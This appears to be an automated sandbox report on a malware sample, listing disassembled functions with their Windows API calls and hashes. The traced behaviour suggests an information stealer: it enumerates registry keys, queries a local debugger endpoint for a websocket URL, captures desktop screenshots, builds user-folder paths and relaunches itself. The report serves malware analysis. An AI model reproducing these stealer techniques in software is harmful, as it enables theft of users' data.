                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat
                                    • String ID:
                                    • API String ID: 2500673778-0
                                    • Opcode ID: 1141331ead0c56cf50a5cb36f25d300752379ce1e296aa081212cf8866b6608f
                                    • Instruction ID: 1d91c3ef3babc946c3e00bb80b7032e366813464739045c0a8f32dd30526b8a9
                                    • Opcode Fuzzy Hash: 1141331ead0c56cf50a5cb36f25d300752379ce1e296aa081212cf8866b6608f
                                    • Instruction Fuzzy Hash: 96027D70E016058FCB29DF64C989A6AB7B4BF44328F18807DE419DB356DB75DC82EB80
                                    Function 00F83760 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 222registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F871E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00F871FE
                                    • RegOpenKeyExA.ADVAPI32(?,00A9B258,00000000,00020019,?), ref: 00F837BD
                                    • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00F837F7
                                    • wsprintfA.USER32 ref: 00F83822
                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00F83840
                                    • RegCloseKey.ADVAPI32(?), ref: 00F8384E
                                    • RegCloseKey.ADVAPI32(?), ref: 00F83858
                                    • RegQueryValueExA.ADVAPI32(?,00A9E190,00000000,000F003F,?,?), ref: 00F838A1
                                    • lstrlen.KERNEL32(?), ref: 00F838B6
                                    • RegQueryValueExA.ADVAPI32(?,00A9DF80,00000000,000F003F,?,00000400), ref: 00F83927
                                    • RegCloseKey.ADVAPI32(?), ref: 00F83972
                                    • RegCloseKey.ADVAPI32(?), ref: 00F83989
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                    • String ID: - $%s\%s$?
                                    • API String ID: 13140697-3278919252
                                    • Opcode ID: 618cb8f2d2fcc447ab4fafe9380eb1cb7a67f3a754081fd87d7d30be27a0d3b0
                                    • Instruction ID: 961b78e2c7c573fe5687efa82409e0e86e49ebeb57c6605aac12dbb855a4bb9b
                                    • Opcode Fuzzy Hash: 618cb8f2d2fcc447ab4fafe9380eb1cb7a67f3a754081fd87d7d30be27a0d3b0
                                    • Instruction Fuzzy Hash: 759190B2D002089FCB24EF94DD84AEEB7B9FB48720F148569E519A7211D735AE41DFA0
                                    Function 00F690C0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162networkstringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetOpenA.WININET(00F8CFEC,00000001,00000000,00000000,00000000), ref: 00F690DF
                                    • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00F690FC
                                    • InternetCloseHandle.WININET(00000000), ref: 00F69109
                                    • InternetReadFile.WININET(?,?,?,00000000), ref: 00F69166
                                    • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00F69197
                                    • InternetCloseHandle.WININET(00000000), ref: 00F691A2
                                    • InternetCloseHandle.WININET(00000000), ref: 00F691A9
                                    • strlen.MSVCRT ref: 00F691BA
                                    • strlen.MSVCRT ref: 00F691ED
                                    • strlen.MSVCRT ref: 00F6922E
                                    • strlen.MSVCRT ref: 00F6924C
                                      • Part of subcall function 00F68980: std::_Xinvalid_argument.LIBCPMT ref: 00F68996
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                    • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                    • API String ID: 1530259920-2144369209
                                    • Opcode ID: a8cc049e8943aa4496609b1bf0f760516b3a38f7fcbdb41b0a4699fab7a4342b
                                    • Instruction ID: b7e72934ba131bd79b08ad901734e9989acca12334fd84bb0d954bd626e81d41
                                    • Opcode Fuzzy Hash: a8cc049e8943aa4496609b1bf0f760516b3a38f7fcbdb41b0a4699fab7a4342b
                                    • Instruction Fuzzy Hash: 3651D671A002096BEB20DFA8DC45FDEB7FDDB84710F140169F514E7281DBB4EA45A7A2
                                    Function 00F81660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 00F816A1
                                    • lstrcpy.KERNEL32(00000000,00A8B8D8), ref: 00F816CC
                                    • lstrlen.KERNEL32(?), ref: 00F816D9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F816F6
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F81704
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F8172A
                                    • lstrlen.KERNEL32(00A9A710), ref: 00F8173F
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F81762
                                    • lstrcat.KERNEL32(00000000,00A9A710), ref: 00F8176A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F81792
                                    • ShellExecuteEx.SHELL32(?), ref: 00F817CD
                                    • ExitProcess.KERNEL32 ref: 00F81803
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                    • String ID: <
                                    • API String ID: 3579039295-4251816714
                                    • Opcode ID: 83a79e91f27b4d9d4abbbac48e0f2e8ec9df0fb9fa422ae1f12a1f1f59b1c298
                                    • Instruction ID: aff4db2849fb32f1dfabffb2fdb0d258acf97edcec9d8a42e156dcf70d6eb2c8
                                    • Opcode Fuzzy Hash: 83a79e91f27b4d9d4abbbac48e0f2e8ec9df0fb9fa422ae1f12a1f1f59b1c298
                                    • Instruction Fuzzy Hash: 1B51B370D01619ABDB25EFA4C884ADEB7FDBF48310F044139E525E3245EB34AE42DB90
                                    Function 00F7EFB0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 164stringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7EFE4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7F012
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F7F026
                                    • lstrlen.KERNEL32(00000000), ref: 00F7F035
                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 00F7F053
                                    • StrStrA.SHLWAPI(00000000,?), ref: 00F7F081
                                    • lstrlen.KERNEL32(?), ref: 00F7F094
                                    • lstrlen.KERNEL32(00000000), ref: 00F7F0B2
                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 00F7F0FF
                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 00F7F13F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$AllocLocal
                                    • String ID: ERROR
                                    • API String ID: 1803462166-2861137601
                                    • Opcode ID: 99b6f779a987417000370b1980cfbc12f8348624c45d74d83fe6035fb040d7b0
                                    • Instruction ID: b942caf72a872980201b775a1571e0118075d0e202d5184f1a12f82ded5cc820
                                    • Opcode Fuzzy Hash: 99b6f779a987417000370b1980cfbc12f8348624c45d74d83fe6035fb040d7b0
                                    • Instruction Fuzzy Hash: FE51C131D116059FCB31EF74DC59AAE77A4AF55310F08807AF85ADB202DB78EC05AB92
                                    Function 00F6A010 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetEnvironmentVariableA.KERNEL32(00A99078,01199BD8,0000FFFF), ref: 00F6A026
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6A053
                                    • lstrlen.KERNEL32(01199BD8), ref: 00F6A060
                                    • lstrcpy.KERNEL32(00000000,01199BD8), ref: 00F6A08A
                                    • lstrlen.KERNEL32(00F94C4C), ref: 00F6A095
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6A0B2
                                    • lstrcat.KERNEL32(00000000,00F94C4C), ref: 00F6A0BE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6A0E4
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6A0EF
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6A114
                                    • SetEnvironmentVariableA.KERNEL32(00A99078,00000000), ref: 00F6A12F
                                    • LoadLibraryA.KERNEL32(00A9DE30), ref: 00F6A143
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                    • String ID:
                                    • API String ID: 2929475105-0
                                    • Opcode ID: 24ba1cd18ee03a0947b824e8755eafc5db5b0ecb59393bf50d2a1a3e5e9e913b
                                    • Instruction ID: 365022f1ef516e4b7d7a77669b4a0f65363db49a0c0e04c259b8384ee4c63b31
                                    • Opcode Fuzzy Hash: 24ba1cd18ee03a0947b824e8755eafc5db5b0ecb59393bf50d2a1a3e5e9e913b
                                    • Instruction Fuzzy Hash: 69914730A00A149FD734AFA4DC95A6637B5FB95724F440138E5369B246EBB9CC80EF92
                                    Function 00F7C840 Relevance: 18.2, APIs: 12, Instructions: 209stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7C8A2
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7C8D1
                                    • lstrlen.KERNEL32(00000000), ref: 00F7C8FC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7C932
                                    • StrCmpCA.SHLWAPI(00000000,00F94C3C), ref: 00F7C943
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID:
                                    • API String ID: 367037083-0
                                    • Opcode ID: 4b0eac5e62435fd9e35aefa9e7d03d31dc1ebcbd5cb5c3c43a9dd1fc1e651d7c
                                    • Instruction ID: 4ed022ff79ec29462d47158a4d8c154e9a821819a654cfe295fe07801162d731
                                    • Opcode Fuzzy Hash: 4b0eac5e62435fd9e35aefa9e7d03d31dc1ebcbd5cb5c3c43a9dd1fc1e651d7c
                                    • Instruction Fuzzy Hash: 0E61E471D112199BEB20EFB5CC45AAE7BF8BF49315F04802EE815E7201D7789D41ABE2
                                    Function 00F841E0 Relevance: 16.7, APIs: 11, Instructions: 177COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00F80CF0), ref: 00F84276
                                    • GetDesktopWindow.USER32 ref: 00F84280
                                    • GetWindowRect.USER32(00000000,?), ref: 00F8428D
                                    • SelectObject.GDI32(00000000,00000000), ref: 00F842BF
                                    • GetHGlobalFromStream.COMBASE(00F80CF0,?), ref: 00F84336
                                    • GlobalLock.KERNEL32(?), ref: 00F84340
                                    • GlobalSize.KERNEL32(?), ref: 00F8434D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                    • String ID:
                                    • API String ID: 1264946473-0
                                    • Opcode ID: ee2bd03f9c045ef7fc7d71281cf12f35d00b053cfb40894983b4eb0b4c9ce3f1
                                    • Instruction ID: 0cc7f57ded28736e776d8cf9981231582ddbbbc576fbe6db3d46382e840259e4
                                    • Opcode Fuzzy Hash: ee2bd03f9c045ef7fc7d71281cf12f35d00b053cfb40894983b4eb0b4c9ce3f1
                                    • Instruction Fuzzy Hash: FF51407191020CAFDB24EFA4DD89AEEB7B9FF48314F144029F925E3244DB74AD419BA1
                                    Function 00F7DFA0 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcat.KERNEL32(?,00A9E490), ref: 00F7E00D
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00F7E037
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7E06F
                                    • lstrcat.KERNEL32(?,00000000), ref: 00F7E07D
                                    • lstrcat.KERNEL32(?,?), ref: 00F7E098
                                    • lstrcat.KERNEL32(?,?), ref: 00F7E0AC
                                    • lstrcat.KERNEL32(?,00A8B860), ref: 00F7E0C0
                                    • lstrcat.KERNEL32(?,?), ref: 00F7E0D4
                                    • lstrcat.KERNEL32(?,00A9DCF0), ref: 00F7E0E7
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7E11F
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00F7E126
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                    • String ID:
                                    • API String ID: 4230089145-0
                                    • Opcode ID: 4ba9a64f4f87ddc09778c3288ddd40a01637c59057926e935d489f14862de2b0
                                    • Instruction ID: 702718dc4478e4a54e2134d8919c22359c91f138d6c382ae503f3cb40dda5113
                                    • Opcode Fuzzy Hash: 4ba9a64f4f87ddc09778c3288ddd40a01637c59057926e935d489f14862de2b0
                                    • Instruction Fuzzy Hash: 4A61B071D1011CDBCB65DB64CC45ADDB3B8BF4C310F1489AAA629A3240DBB49F85AF90
                                    Function 00F66AD0 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F66AFF
                                    • InternetOpenA.WININET(00F8CFEC,00000001,00000000,00000000,00000000), ref: 00F66B2C
